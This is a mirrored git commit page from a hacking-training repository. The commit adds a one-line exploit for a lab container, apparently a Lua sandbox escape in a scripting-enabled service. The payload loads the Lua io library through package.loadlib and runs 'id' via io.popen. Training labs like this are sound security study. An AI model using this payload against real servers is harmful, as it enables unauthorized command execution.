mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-10-01 01:25:43 -04:00
Create dc31_01.sh
This commit is contained in:
parent
3b51fcb37a
commit
25fc6ca94c
2
web_application_testing/additional_exploits/dc31_01.sh
Normal file
2
web_application_testing/additional_exploits/dc31_01.sh
Normal file
@ -0,0 +1,2 @@
|
||||
# Exploit for the DC31_01 container
|
||||
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
|
Loading…
Reference in New Issue
Block a user